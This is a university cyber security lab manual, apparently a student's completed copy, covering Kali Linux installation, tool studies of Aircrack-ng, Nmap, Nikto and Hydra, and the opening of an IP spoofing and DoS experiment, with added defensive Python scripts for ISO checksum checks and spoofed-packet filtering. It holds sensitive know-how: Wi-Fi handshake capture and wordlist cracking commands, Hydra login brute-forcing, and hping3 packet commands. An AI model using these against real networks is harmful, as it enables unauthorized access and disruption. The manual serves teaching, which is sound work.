
A Laboratory Manual for

Cyber Security
(3150714)

B.E. Semester 5
(Computer Science Engineering)

Directorate of Technical Education, Gandhinagar, Gujarat
Government Engineering College, Patan

Certificate

This is to certify that Mr. Tandel Priyanshu Nareshbhai, Enrollment No. 220220131133 of B.E. Semester 5th
Information Technology of this Institute (GTU Code: 022), has satisfactorily completed the Practical / Tutorial
work for the subject Cyber Security (3150714) for the academic year 2024-25.

Place:
Date:

Head of the Department Name and Sign of Faculty member


Cyber Security (3150714)

Preface

Cyber security is the technology and process that is designed to protect networks and devices
from attacks, damage, or unauthorized access. Cyber security is essential for a country’s military,
hospitals, large corporations, small businesses, and other organizations and individuals since data
is now the cornerstone of any organization.

The cyber security practical lab manual is a guide for students who want to learn and practice
various aspects of cyber security in a realistic and hands-on manner. The manual provides a set
of experiments, simulations, tests, and projects related to cyber security that cover various topics
such as cryptography, network security, web security, malware analysis, penetration testing, etc.

The manual consists of several chapters, each containing a brief introduction to the topic, a list of
objectives, a description of the required tools and software, a step-by-step procedure for
conducting the experiment or project, some questions for self-assessment or discussion, and some
references for further reading.

One of the objectives of this cyber security practical lab manual is to help students understand the
cyber laws that govern and protect cyberspace. Cyber laws are the legal framework that regulates
and protects cyberspace from cyber threats. Cyber laws aim to prevent, detect, and punish
cybercrimes and to promote cyber security awareness and best practices among users.

The manual is intended for the third-year students of the Information Technology branch in the
subject of cyber security. The manual assumes that the students have some basic knowledge of
computer networks, operating systems, programming languages. The manual also assumes that
the students have access to a cyber security laboratory that provides a realistic network
environment with various devices and software.

The manual aims to provide a stimulating and engaging learning experience for students who
want to pursue a career or further education in cyber security. The manual also hopes to inspire
students to contribute to the advancement of cyber security knowledge and practice in the society.

Practical – Course Outcome matrix

Course Outcomes:
1. Describe system and web vulnerability.
2. Evaluate network defense tools.
3. Understand the cyber laws.
4. Investigate cybercrime, prepare a report, and apply laws for the case.

Sr. No. | Objective(s) of Experiment | CO1 CO2 CO3 CO4
1. | Install Kali Linux. Examine the utilities and tools available in Kali Linux and Analyze 5 tools. | √ √
2. | Evaluate network defense tools for following. (i) IP spoofing (ii) DOS attack | √ √
3. | Explore the Nmap tool and list how it can be used for network defense. | √
4. | Explore the NetCat tool. | √ √
5. | Use Wireshark tool and explore the packet format. | √ √
6. | Examine SQL injection attack. Perform SQL injection with SQLMap on vulnerable websites. | √ √
7. | Examine software keyloggers and hardware keyloggers | √ √
8. | Perform online attacks and offline attacks of password cracking | √ √
9. | Consider a case study of cybercrime, where the attacker has performed online credit card fraud. Prepare a report and list the laws that will be implemented on attacker | √ √

Industry Relevant Skills

The following industry relevant competencies are expected to be developed in the student by
undertaking the practical work of this laboratory.
1. Knowledge: Students are expected to acquire knowledge of various concepts and
principles of cyber security, such as cryptography, network security, web security,
malware analysis, penetration testing, etc. Students are also expected to acquire the
knowledge of various cyber laws and regulations that govern and protect cyberspace.
2. Skills: Students are expected to develop the skills and techniques to identify, analyze,
and mitigate cyber risks and vulnerabilities. Students are also expected to develop the
skills and techniques to use various tools and software to perform cyber security tasks,
such as encryption, authentication, scanning, etc.
3. Attitude: Students are expected to develop a positive attitude towards cyber security
and its importance in the digital world. Students are also expected to develop a sense
of responsibility and ethics in cyberspace. Students are also expected to develop a habit
of continuous learning and updating their knowledge and skills in cyber security.

Guidelines for Faculty members


• Faculty members should ensure that they have adequate knowledge and skills in cyber
security and its related topics. Faculty members should also keep themselves updated
with the latest developments and trends in cyber security.
• Faculty members should prepare and plan the practical sessions in advance and ensure
that the required tools and software are available and working properly. Faculty
members should also ensure that the laboratory environment is safe and secure for the
students and the equipment.
• Faculty members should explain the objectives, outcomes, and procedures of each
experiment or project clearly and concisely to the students. Faculty members should
also demonstrate the steps and techniques involved in each experiment or project to the
students.
• Faculty members should supervise and monitor the students’ progress and performance
during the practical sessions. Faculty members should also provide guidance, feedback,
and support to the students as and when required. Faculty members should also
encourage the students to ask questions and clear up their doubts.
• Faculty members should evaluate the students’ work and results based on predefined
criteria and rubrics. Faculty members should also provide constructive feedback and
suggestions for improvement to the students. Faculty members should also appreciate
and acknowledge the students’ efforts and achievements.
• Faculty members should promote a culture of cyber security awareness and best
practices among the students. Faculty members should also instill a sense of
responsibility and ethics in cyberspace among the students. Faculty members should
also motivate and inspire the students to pursue a career or further education in cyber
security.

Instructions for Students


• Students should read and understand the objectives, outcomes, and procedures of each
experiment or project before starting the practical session. Students should also prepare and
review the required tools and software for each experiment or project.
• Students should follow the instructions and guidelines given by the faculty members during
the practical session. Students should also perform the steps and techniques involved in each
experiment or project carefully and accurately. Students should also record their
observations and results properly and systematically.
• Students should ask questions and clear their doubts with the faculty members or their peers
during the practical session. Students should also seek guidance, feedback, and support from
the faculty members or their peers as and when required. Students should also share their
knowledge and skills with their peers.
• Students should submit their work and results to the faculty members for evaluation within
the stipulated time. Students should also accept and implement the feedback and suggestions
given by the faculty members for improvement. Students should also learn from their
mistakes and achievements.
• Students should follow cyber security best practices and standards while performing cyber
security tasks. Students should also respect the rights and privacy of others in cyberspace.
Students should also avoid any unethical or illegal activities in cyberspace.
• Students should develop an interest and passion for cyber security and its related topics.
Students should also update their knowledge and skills in cyber security regularly. Students
should also explore career or further education opportunities in cyber security.

Common Safety Instructions


1. Students are expected to be careful at all times.
2. Students should wear appropriate clothing and footwear while working in the laboratory.
Students should also avoid wearing loose or dangling accessories that may get caught in the
equipment.
3. Students should handle the equipment and devices with care and caution. Students should
also avoid touching any wires or cables that may be alive or hot. Students should also switch
off and unplug the equipment and devices when not in use or when leaving the laboratory.
4. Students should keep the laboratory clean and tidy. Students should also dispose of any
waste materials properly and safely. Students should also report any spills, leaks, or damages
to the faculty members or the laboratory staff immediately.
5. Students should follow the emergency procedures in case of any fire, electric shock, injury,
or other accidents. Students should also know the location and use of the fire extinguishers,
first aid kits, and emergency exits in the laboratory.
6. Students should respect the laboratory rules and policies. Students should also cooperate and
communicate with the faculty members, the laboratory staff, and their peers in the
laboratory. Students should also avoid any disruptive or dangerous behavior in the
laboratory.

Index
(Progressive Assessment Sheet)

Sr. No. | Objective(s) of Experiment | Page No. | Date of performance | Date of submission | Assessment Marks | Sign. of Teacher with date | Remarks
1 | Install Kali Linux. Examine the utilities and tools available in Kali Linux and Analyze 5 tools. | | | | | |
2 | Evaluate network defense tools for following. (i) IP spoofing (ii) DOS attack | | | | | |
3 | Explore the Nmap tool and list how it can be used for network defense. | | | | | |
4 | Explore the NetCat tool. | | | | | |
5 | Use Wireshark tool and explore the packet format. | | | | | |
6 | Examine SQL injection attack. Perform SQL injection with SQLMap on vulnerable websites. | | | | | |
7 | Examine software keyloggers and hardware keyloggers | | | | | |
8 | Perform online attacks and offline attacks of password cracking | | | | | |
9 | Consider a case study of cybercrime, where the attacker has performed online credit card fraud. Prepare a report and list the laws that will be implemented on attacker | | | | | |
Total | | | | | | |

Experiment No: 1

Install Kali Linux. Examine the utilities and tools available in Kali Linux and
Analyze 5 tools.
Date:

Competency and Practical Skills: Students will be able to install and use Kali Linux, a popular
operating system for cyber security professionals and ethical hackers. Students will also be able
to explore and study various utilities and tools available in Kali Linux for performing different
cyber security tasks.

Relevant CO:
1. Describe system and web vulnerability.
2. Evaluate network defense tools.

Objectives:

a. To introduce students to Kali Linux, a popular operating system for cyber security professionals
and ethical hackers.
b. To enable students to install and use Kali Linux on a virtual machine or a physical machine.
c. To familiarize students with the basic settings and preferences of Kali Linux.
d. To teach students how to update and upgrade the Kali Linux system and its packages.
e. To help students navigate and use the graphical user interface (GUI) and the command-line
interface (CLI) of Kali Linux.
f. To provide students with Kali Linux documentation and help resources.
g. To expose students to the utilities and tools available in Kali Linux for different cyber security
tasks.
h. To train students how to use five tools of their choice from different categories for performing
cyber security tasks.

Equipment/Instruments: Computer, Internet

Introduction

Kali Linux is a free and open-source Linux-based operating system that is designed for advanced
Penetration Testing and Security Auditing. It contains several hundred tools for various Information
Security tasks, such as Penetration Testing, Security Research, Computer Forensics, Reverse Engineering,
Vulnerability Management and Red Team Testing. It was developed by Mati Aharoni and Devon Kearns
of Offensive Security. Kali Linux is a multi-platform solution that can be used by information security
professionals and hobbyists.

Advantages:
• It has 600+ penetration testing and network security tools pre-installed.
• It is completely free and open source, so you can use it for free and even contribute to its
development.
• It supports many languages.
• Great for those who are intermediate in Linux and have hands-on experience with Linux commands.
• Can easily be used with a Raspberry Pi.

Disadvantages:

• It is not recommended for those who are new to Linux and want to learn Linux (as it is
penetration-testing oriented).
• It is a bit slower.
• Some software may malfunction.

Why Kali Linux?

If you are into penetration testing or cybersecurity in general, you'll appreciate that Kali Linux
already has the specialized tools you'll need installed and configured. Also, if you're curious about any
security-related problems in a program or website, Kali Linux is an excellent choice.

There is a common misconception that Kali may be used to break into user accounts or servers; this is one of
the most widespread misconceptions regarding Kali Linux. Kali Linux is essentially a specialized
version of Debian that includes a suite of security and network administration utilities. It is a weapon
for self-defense or self-training only. Kali Linux's primary target audience is IT specialists. Those
interested in Penetration Testing, Cyber Security, or Ethical Hacking will find it useful. It is a
potent instrument, and its misuse could result in financial losses.

Installation Steps

There are various methods available for the installation of Kali Linux. The OS can be installed directly
onto the computer or through a Virtual Machine (VM). If you wish to install it directly onto your
computer you will need a USB stick, the Kali Linux ISO and Rufus to make a bootable USB drive. For VM
installation you require the VirtualBox software and the Kali Linux ISO. The installation steps for both
methods remain the same.

1. System Requirements:
a. A Computer (Minimum Requirements: 20GB Hard Disk space, 2GB RAM, Intel Core i3
or AMD E1 equivalent)
2. Installation Prerequisites
a. USB stick (6 GB or more)
b. Kali Linux ISO file (https://www.kali.org/)
c. Rufus (to create a bootable drive - https://rufus.ie/en/)
d. If Kali Linux will be installed in a Virtual Machine, make sure the VirtualBox
software (https://www.virtualbox.org/) is installed.
3. Creating a New VM
Once you have downloaded the installation image, you can create a new VM. Open VirtualBox and
create a new VM (Machine > New or Ctrl+N) on which Kali Linux will be installed.

Set the following VM parameters:

Name: Kali_x64
Machine Folder: C:\Virtual\VirtualBox (This path is used only for demo purpose. Try not to use a
system partition to store VMs).
Type: Linux
Version: Debian (64-bit)
Memory size: 4096 MB. The VM memory size must be large enough to run a guest OS, though you
should leave enough unallocated memory to run your host OS. In the current example, a host machine
with 16 GB of RAM is used, which provides enough memory left for a host OS.
Hard disk: Create a virtual hard disk now.
Hit Create to continue and configure a new virtual hard disk.

Set the virtual disk file location, for example C:\Virtual\VirtualBox\Kali_x64\Kali_x64.vdi

It is recommended that you store virtual disk files in the VM folder (this folder is selected by default).

Set the virtual disk file size. It should be at least 20 GB.

Hard disk file type: VDI. A native VirtualBox format is selected.

Storage on physical disk: Dynamically allocated.
Click Create to finish creating a new VM.

After creating a new VM, some additional settings must be configured. Select your recently created
virtual machine and open the VM settings.

Display options
Go to Display > Screen and set Video Memory to 128 MB. This prevents the installer from hanging.
Next, tick the checkbox Enable 3D acceleration (optional). It will be useful for applications that need
3D acceleration.

Network options
Next, go to the network settings and select the networking mode of the virtual network adapter of the
VM. Let’s select the Bridged mode to use the VM network adapter much as you would for a physical
network adapter of the host machine. In this case, the VM network adapter is connected to the same
physical network as the host machine. You can set additional options such as network adapter name,
type, MAC address etc.

Boot options

You must insert the ISO image into the virtual DVD drive of the VM and then boot the virtual
machine from that ISO. In the VM settings, go to Storage, select the IDE controller of your virtual
optical drive (it is empty by default). Click Empty, then click the disc icon next to IDE Secondary
Master and in the menu that opens select Choose Virtual Optical Disk File. Browse to the Kali Linux
installation ISO image that you downloaded from the official site earlier (kali-linux-2019.2-
amd64.iso). Hit OK to save settings.

4. Start Installation

Now you can start your new VM (Kali_x64 in this case) and begin the Kali installation.

After booting from a virtual DVD, you will see a boot menu where you can select boot options for Kali
Linux such as Boot from Live DVD, Install, Graphical Install etc. Let’s select Graphical Install.
Press Enter to continue.

5. Select a language. Choose the language you wish to use for the installation process and the
installed system. English is selected for the current installation. Click the Continue button on
each screen to move forward.

6. Select your location. This option is used to set your time zone, time format, etc. United States
has been selected in the current example.

7. Configure the keyboard. Select your keyboard layout. American English is used for the current
installation.

8. Configure the network. Enter the hostname for your Linux system, for example, kali-
virtualbox.

9. Configure the domain name. If you don’t use a domain in your network, you may leave this
field empty.

10. Set up users and passwords. Read the useful tips on this screen and enter the password for root.

11. Configure the clock. Now you can select a precise time zone for your country.

12. Partition disks. You can use manual and guided partitioning of disks. For the first time, you can
select Guided – use entire disk. The entire disk will be used for creating one big partition.

Confirm that you want to erase the disk. There is no reason to worry, as in this case, the empty 20-GB
virtual disk is used for partitioning.

Select a preferred partitioning scheme for your virtual disk. Let’s select All files in one partition.

Check the overview and select Finish partitioning and write changes to disk.

Select Yes and confirm that you would like to write changes to the disk.

13. Wait for the system to be installed. As Kali Linux is being installed, the files are being copied to
the virtual disk of the VM.

14. Configure the package manager. Click Yes if you would like to use a network mirror. Selecting
this option will allow you to install or update application packages from online software
repositories.

Enter the information about your proxy server if you use a proxy server for internet access from your
network. There is no proxy server in this example; so this field is left empty.

15. Install the GRUB boot loader on a hard disk. Since there are no other operating systems or
boot loaders on the virtual disk, it is necessary to install GRUB in this case. Select Yes to install
GRUB.

Select a disk to which GRUB must be installed. In this case, /dev/sda is the necessary disk and is the
only disk connected to a VM.

16. Finish the installation. When the installation of Kali Linux on VirtualBox is complete, you will
see a notification message. Now you can reboot the virtual machine to boot the Kali Linux
installed on the VirtualBox VM.

After the reboot, you will see the login screen of Kali Linux. Enter root as the username, then enter the
password set during the installation to sign in.

Now you should see the Gnome Desktop of Kali Linux installed on your VirtualBox virtual machine.

Once the installation is complete, open the terminal and type “sudo apt-get update”. This refreshes the
package repositories, so make sure that you are connected to the internet. After that, various drivers can
be installed on Kali Linux. For how to install drivers in Kali Linux, refer to
https://www.nakivo.com/blog/how-to-install-kali-linux-on-virtualbox/
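A practitioner would check the downloaded ISO against the checksum Kali publishes beside it before booting it; the script below is an added example, not code from the manual or from the Kali project. It assumes the checksum file follows the standard sha256sum layout (one `<hex digest>  <filename>` line per file) and builds a constructed stand-in ISO and sums file so it runs offline.

```python
"""Verify a downloaded Kali ISO against a sha256sum-style checksum file.

Added example: it constructs its own sample files, so no real ISO is needed.
"""
from __future__ import annotations

import hashlib
import hmac
import tempfile
from pathlib import Path

# Filename taken from the manual's installation steps.
ISO_NAME = "kali-linux-2019.2-amd64.iso"


def parse_sha256sums(text: str) -> dict[str, str]:
    """Map filename -> lowercase hex digest from sha256sum-format text.

    Lines look like "<64 hex chars>  <filename>" (two spaces, or " *" for
    binary mode). Blank lines and comments are skipped; malformed lines raise.
    """
    sums: dict[str, str] = {}
    hexdigits = set("0123456789abcdefABCDEF")
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition(" ")
        name = name.lstrip(" *")
        if len(digest) != 64 or set(digest) - hexdigits or not name:
            raise ValueError(f"malformed checksum line {lineno}: {line!r}")
        sums[name] = digest.lower()
    return sums


def sha256_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Stream the file through SHA-256 so a multi-GB ISO is never loaded into RAM."""
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_iso(iso_path: Path, sums_path: Path) -> tuple[bool, str]:
    """Return (ok, reason). An unlisted file and a mismatch both count as failure."""
    sums = parse_sha256sums(sums_path.read_text(encoding="utf-8"))
    expected = sums.get(iso_path.name)
    if expected is None:
        return False, f"{iso_path.name} is not listed in {sums_path.name}"
    actual = sha256_file(iso_path)
    # Constant-time comparison is a cheap habit for any digest check.
    if hmac.compare_digest(actual, expected):
        return True, "SHA-256 matches the published checksum"
    return False, f"SHA-256 mismatch: expected {expected[:12]}..., got {actual[:12]}..."


def make_sample_download(directory: Path, tamper: bool = False) -> tuple[Path, Path]:
    """Create a constructed stand-in ISO plus a matching SHA256SUMS file.

    With tamper=True the ISO bytes are altered after the sums file is written,
    simulating a corrupted or substituted download.
    """
    iso = directory / ISO_NAME
    iso.write_bytes(b"constructed stand-in for the Kali ISO\n" * 1000)
    sums = directory / "SHA256SUMS"
    sums.write_text(f"{sha256_file(iso)}  {ISO_NAME}\n", encoding="utf-8")
    if tamper:
        with iso.open("r+b") as fh:
            fh.write(b"X")  # flip the first byte
    return iso, sums


def demo(tamper: bool = False) -> bool:
    """Build a sample download in a temp dir and return the verification verdict."""
    with tempfile.TemporaryDirectory() as tmp:
        iso, sums = make_sample_download(Path(tmp), tamper=tamper)
        return verify_iso(iso, sums)[0]


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for tamper in (False, True):
            iso, sums = make_sample_download(Path(tmp), tamper=tamper)
            ok, why = verify_iso(iso, sums)
            print(f"tamper={tamper}: ok={ok} ({why})")
```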

Popular Stress Testing Tools in Kali Linux:


1. Aircrack-ng
2. Burpsuite
3. Crackmapexec
4. Hydra
5. Johntheripper (jtr)
6. Metasploit
7. Nmap (Network Mapper)
8. Responder
9. Sqlmap
10. Wireshark

1. Aircrack-ng

Introduction to Aircrack-ng

Aircrack-ng is a tool that comes pre-installed in Kali Linux and is used for Wi-Fi network security and
hacking. Aircrack is an all-in-one packet sniffer, WEP and WPA/WPA2 cracker, analyzing tool and a
hash capturing tool. It is a tool used for Wi-Fi hacking. It helps in capturing the package and reading the
hashes out of them and even cracking those hashes by various attacks like dictionary attacks. It supports
almost all the latest wireless interfaces.
It mainly focuses on 4 areas:

Monitoring: Captures cap, packet, or hash files.


Attacking: Performs de-authentication or creates fake access points
Testing: Checking the Wi-Fi cards or driver capabilities
Cracking: Various security standards like WEP or WPA PSK.

Strength and Weakness

Strengths
• A famous hacker tool that you can use for nothing.
• Versions for Windows as well as Unix, Linux, and macOS
• Already installed in Kali Linux
• Can crack wireless network encryption.
Weakness
• Difficult to install.
• Difficult to use.
• No graphical user interface
• Excels at cracking WEP encryption, which is no longer used on wireless systems.
• The WPA-TKP utilities don’t work.

Working with aircrack-ng

1. To list all wireless network interfaces:

airmon-ng
This command will list all the wireless network interfaces available or connected to the system.

2. Stopping the desired monitor-mode interface:

airmon-ng stop wlan0mon
To stop a monitor-mode interface enter the above command and replace “wlan0mon” with the desired network
interface.

3. Starting a network interface at a specific channel:

airmon-ng start wlan0 10
To start a network interface in monitor mode on a specific channel enter the above command and replace “wlan0” with
the desired network interface and 10 with the desired channel number.

4. Collecting the authentication handshake

airodump-ng -c 10 --bssid 00:15:5D:9C:44:00 -w psk wlan0

To collect the authentication handshake, enter the above command in the terminal and replace “wlan0”
with the desired network interface, 10 with the desired channel number, and the bssid with the BSSID of
the Wi-Fi network. The -w psk option writes the capture to files named psk*.cap.

5. Cracking the captured handshake file by means of a wordlist

aircrack-ng -w wordlist psk*.cap

To run a dictionary (wordlist) attack and crack the password, enter the above command in the terminal and replace
“wordlist” with the desired wordlist to be used and “psk*.cap” with the desired handshake capture filename.

6. To get the help section of the tool


aircrack-ng --help
The above command will display the help section of the aircrack-ng command.

7. To display the number of CPUs and SIMD support

aircrack-ng -u
The above command displays the number of CPUs and the SIMD support available to aircrack-ng.

WRITE ABOUT TOOLS, AT LEAST 5 TOOLS USED BY CYBER SECURITY EXPERTS.
PLEASE TAKE REFERENCE OF THE ABOVE AIRCRACK-NG TOOL.

Study of Tool

Nmap:

• Nmap is a network scanner used to discover hosts, services, and vulnerabilities on a network.
• Nmap is a Linux command-line tool for network exploration and security auditing.
• This tool is generally used by hackers and cybersecurity enthusiasts and even by network and system administrators.
• It is used for the following purposes:
  • Real-time information of a network
  • Detailed information of all the IPs active on your network
  • Number of ports open in a network
  • Provide the list of live hosts
  • Port, OS and host scanning

Strengths of Nmap:
Nmap is a versatile, accurate, and fast network scanning tool with a wide range of features and options.
It can be used to discover hosts, services, and vulnerabilities on a network, and is a valuable tool for network
administrators, security professionals, and system engineers.

Weaknesses of Nmap:
Nmap can be detected by firewalls and intrusion detection systems (IDS), which can prevent it from
scanning certain networks or hosts. Additionally, Nmap may produce false positives, which can lead to
unnecessary investigations or alerts.

Example:
• Scan using Hostname:
• Scan using IP Address:

Study of Tool

Nikto:

• Nikto is an open-source web server scanner which performs comprehensive tests
against web servers like Apache, Nginx, IIS, OHS, LiteSpeed, and so on.
• Nikto can check for server configuration items such as the presence of multiple index
files, HTTP server options, and will attempt to identify installed web servers and
software.

Strengths of Nikto:

• Limited to web servers
• May miss some vulnerabilities
• Can trigger false positives
• Can be detected by firewalls

Weaknesses of Nikto:

• Limited to web servers
• May miss some vulnerabilities
• Can trigger false positives
• Can be detected by firewalls

Example:
• Scanning website

Hydra:
• Hydra is one of the most powerful open-source password-cracking programs available in Kali Linux.
• It is used for dictionary attacks and brute-forcing.
• It can brute-force by sending multiple login requests very rapidly to a variety of network protocols,
services, websites, and web applications.
• It can support more than 50 network protocols and services like Telnet, SSH, HTTP, HTTPS, RDP, SMTP, FTP, etc.

Strengths of Hydra:

• Supports a wide range of protocols (FTP, SSH, Telnet, HTTP, SMB, etc.)
• Supports various hashing algorithms (MD5, SHA1, NTLM, etc.)
• Fast and efficient
• Customizable
• Easy to use
• Free and open-source

Weaknesses of Hydra:
• Can be detected by intrusion detection systems (IDS)
• May take a long time to crack strong passwords
• Can be computationally intensive
• Requires a dictionary or brute force list
• May not be effective against multi-factor authentication (MFA)

• The figure above shows the output of Hydra at work.
• Once the Hydra tool brute-forces the correct username and password for
the target domain, execution stops and the cracked username and password are
shown in the terminal itself.
• In the screenshot above we can see that we created the target
login page and obtained the login details of the domain.

Conclusion

In conclusion, this experiment introduced students to Kali Linux, a powerful tool for
cybersecurity professionals and ethical hackers. By installing and exploring the operating system,
students gained hands-on experience with its various utilities and tools. They learned to
navigate the system, update packages, and understand the use of key tools for
cyber security tasks, enhancing their ability to detect and prevent system
vulnerabilities and strengthen network defense.

Quiz:
1. What is the name of the website where you can download the Kali Linux ISO file?
a) kali.org
b) kali.com
c) kali.net
d) kali.io

2. What tool can you use to create a bootable USB drive with Kali Linux?
a) Rufus
b) Etcher
c) UNetbootin
d) Any of the above

3. What is the minimum amount of RAM recommended for installing Kali Linux with the default Xfce4 desktop and
the kali-linux-default metapackage?
a) 128 MB
b) 512 MB
c) 2 GB
d) 8 GB

4. What setting do you need to disable in your UEFI settings before installing Kali Linux?
a) Fast Boot
b) Secure Boot
c) Legacy Boot
d) Boot Order

5. What are the two options for starting the installation of Kali Linux from the boot screen?
a) Graphical install or Install (Text-Mode)
b) Live install or Install (Command-Line)
c) Standard install or Install (Advanced)
d) Basic install or Install (Custom)

Suggested Reference:

1. https://www.kali.org/
2. https://www.nakivo.com/blog/how-to-install-kali-linux-on-virtualbox/
3. https://rufus.ie/en/
4. https://www.virtualbox.org/
5. https://www.kali.org/tools/aircrack-ng/

References used by the students: (Sufficient space to be provided)

https://www.geeksforgeeks.org/crack-web-based-login-page-with-hydra-in-kali-linux/

Rubric wise marks obtained:

Criteria | 1 | 2 | 3 | 4 | 5 | Total
Marks | | | | | |

Faculty Signature

Experiment No: 02

Evaluate network defense tools for following.
(i) IP spoofing (ii) DOS attack
Date:

Competency and Practical Skills:

Relevant CO: Evaluate network defense tools.

Objectives:
• To understand what IP spoofing and DoS attack are and how they are used to launch attacks on a
network.
• To learn about the different types of IP spoofing attacks and how they can be detected and
prevented using network defense tools.
• To compare the effectiveness of various network defense tools against IP spoofing and DoS
attacks, such as packet filtering, ingress filtering, egress filtering, encryption, authentication, and
anomaly detection.
• To apply the network defense tools to a simulated network environment and test their performance
against IP spoofing and DoS attacks using different attack scenarios and parameters.
• To evaluate the results of the network defense tools and analyze their strengths and weaknesses
against IP spoofing and DoS attacks.

Equipment/Instruments: Computer with Internet

Theory

What is IP Spoofing?
IP Spoofing is a technique used by attackers to forge the source IP address of a packet in order to
impersonate another system, deceive the recipient, and gain unauthorized access to a network. The attacker
modifies the packet header to make it appear as if it was sent from a trusted source, such as a legitimate
user, device or server on the network.

By using IP spoofing, the attacker can hide their identity, bypass security mechanisms that rely on source
IP addresses for access control, and launch various types of attacks, such as distributed denial-of-service
(DDoS) attacks, network reconnaissance, and data theft.

IP spoofing is possible because the Internet Protocol (IP) does not provide authentication or integrity
protection for the source address field. As a result, it is relatively easy for an attacker to manipulate the
source IP address of a packet using various tools and techniques, such as packet crafting, network
scanners, and software-defined networking (SDN) controllers.

To mitigate IP spoofing, various countermeasures have been developed, including access control lists
(ACLs), ingress filtering, and packet filtering. These mechanisms verify the authenticity of the source IP
address of incoming packets and drop any packet that has a spoofed address.
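As an added example (not part of the lab manual), the ingress/egress filtering rule described above written out as code: each packet's claimed source address is checked against the interface it arrived on, in the BCP 38 style. The interface names, prefixes and sample packets are constructed for illustration.

```python
"""Added example: a minimal BCP 38 style ingress/egress filter that decides,
per packet, whether the claimed source address is plausible for the interface
the packet arrived on. Topology and packets are constructed."""
import ipaddress
from dataclasses import dataclass

# Constructed topology: prefixes that may legitimately originate on each
# internal interface. "wan0" is the untrusted uplink and owns no prefix.
INTERFACE_PREFIXES = {
    "lan0": [ipaddress.ip_network("192.168.1.0/24")],
    "dmz0": [ipaddress.ip_network("10.10.0.0/16")],
    "wan0": [],
}
WAN_IFACE = "wan0"

# Sources that must never arrive on the uplink: private and unroutable ranges.
NEVER_FROM_WAN = [
    ipaddress.ip_network("0.0.0.0/8"),
    ipaddress.ip_network("127.0.0.0/8"),
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
    ipaddress.ip_network("169.254.0.0/16"),
]


@dataclass(frozen=True)
class Packet:
    iface: str  # interface the packet arrived on
    src: str    # claimed source IP address
    dst: str    # destination IP address


def _in_any(addr, networks):
    return any(addr in net for net in networks)


def filter_packet(pkt: Packet) -> str:
    """Return 'ACCEPT' or 'DROP: <reason>' for one inbound packet.

    Rule 1 (ingress on the uplink): a packet from the Internet must not claim
      an internal or otherwise unroutable source address.
    Rule 2 (egress from an internal segment): a packet leaving a segment must
      carry a source that belongs to that segment, so a packet spoofed inside
      the network is stopped at the first router it crosses.
    """
    try:
        src = ipaddress.ip_address(pkt.src)
    except ValueError:
        return "DROP: malformed source address"
    if pkt.iface not in INTERFACE_PREFIXES:
        return "DROP: unknown interface"
    if pkt.iface == WAN_IFACE:
        if _in_any(src, NEVER_FROM_WAN):
            return "DROP: external packet claims internal/bogon source"
        return "ACCEPT"
    if not _in_any(src, INTERFACE_PREFIXES[pkt.iface]):
        return "DROP: source not valid for interface"
    return "ACCEPT"


def filter_batch(packets):
    """Apply filter_packet to a list and return {verdict: count} for reporting."""
    counts = {}
    for pkt in packets:
        verdict = filter_packet(pkt)
        counts[verdict] = counts.get(verdict, 0) + 1
    return counts


# Constructed traffic sample: two legitimate packets and three spoofed ones.
SAMPLE_PACKETS = [
    Packet("lan0", "192.168.1.20", "8.8.8.8"),      # legitimate LAN client
    Packet("wan0", "203.0.113.7", "192.168.1.20"),  # legitimate Internet reply
    Packet("wan0", "192.168.1.1", "192.168.1.20"),  # outsider posing as our gateway
    Packet("lan0", "10.10.5.5", "8.8.8.8"),         # LAN host spoofing the DMZ
    Packet("lan0", "198.51.100.9", "8.8.8.8"),      # LAN host spoofing an outside address
]

if __name__ == "__main__":
    for pkt in SAMPLE_PACKETS:
        print(f"{pkt.iface:5} {pkt.src:>15} -> {pkt.dst:<15} {filter_packet(pkt)}")
```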

How does it work?


IP Spoofing can be performed using several techniques, depending on the attacker's goals and the
complexity of the network infrastructure. Here are some common methods:

• Blind Spoofing: In this technique, the attacker sends packets to the target system without receiving
any feedback from it. The attacker sends a packet with a spoofed source IP address and waits for
the target to respond to the fake address. Since the attacker cannot receive the response from the
target, this technique is also called "one-way communication".

• Non-blind Spoofing: In this technique, the attacker sends packets to the target and receives
feedback from it. The attacker sends packets with a spoofed source IP address and waits for the
target to respond to the fake address. The attacker intercepts the response and sends it back to the
original sender. This technique is also called "two-way communication".

• Man-in-the-middle (MitM) Spoofing: In this technique, the attacker intercepts the
communication between two systems and modifies the packets before forwarding them to their
intended destination. The attacker sets up a fake system that pretends to be the legitimate
destination system and sends packets to the source system with a spoofed source IP address. The
attacker also sends packets to the legitimate destination system with a spoofed source IP address
of the source system. This way, the attacker can intercept and modify the packets without being
detected.

• Distributed Spoofing: In this technique, multiple systems are used to perform IP Spoofing. The
attacker infects many systems with malware and uses them as a botnet to send packets with spoofed
source IP addresses. This technique is commonly used in DDoS attacks, where many systems are
used to overwhelm a target system with traffic.

It is important to note that IP Spoofing can be difficult to detect and prevent, especially if the attacker uses
sophisticated techniques and tools. Therefore, it is crucial to implement network security measures, such
as packet filtering and ingress filtering, to prevent unauthorized access and protect against IP Spoofing
attacks.

What tools are available to perform IP Spoofing in Kali Linux?


There are several tools available in Kali Linux that can be used to perform IP Spoofing. Some
commonly used tools are Hping3, Nmap and Scapy.

It is important to note that using these tools for malicious purposes is illegal and unethical. They should
only be used for ethical hacking, network security testing, and educational purposes. Additionally, IP
Spoofing can be harmful and cause disruptions to the network, so it should be used with caution and only
with proper authorization and permission.

1. Hping3: Hping3 is a command-line packet crafting and network scanning tool that can be used to
perform various types of network attacks, including IP Spoofing. It allows you to send custom packets
with a spoofed source IP address to a target system and monitor the response.

• How to Install Hping3


Command: sudo apt-get install hping3

• Hping3 Help Command


Command: hping3 --help or hping3 -h
The above command opens the help menu for hping3, which lists the various parameters of this
software.

• How to send a specific number of packets

Command: hping3 -c 4 192.168.254.130
The above command sends 4 packets to the specified IP address.

The hping3 -c command is used to specify the number of packets to send using hping3. The -c option
followed by a number specifies the count of packets to be sent.

For example, to send 10 TCP packets to a target IP address using hping3, the following command can be
used:

Command: sudo hping3 -S -c 10 <target IP>

In this command, the -S option specifies that the packets should be TCP SYN packets, and the -c 10 option
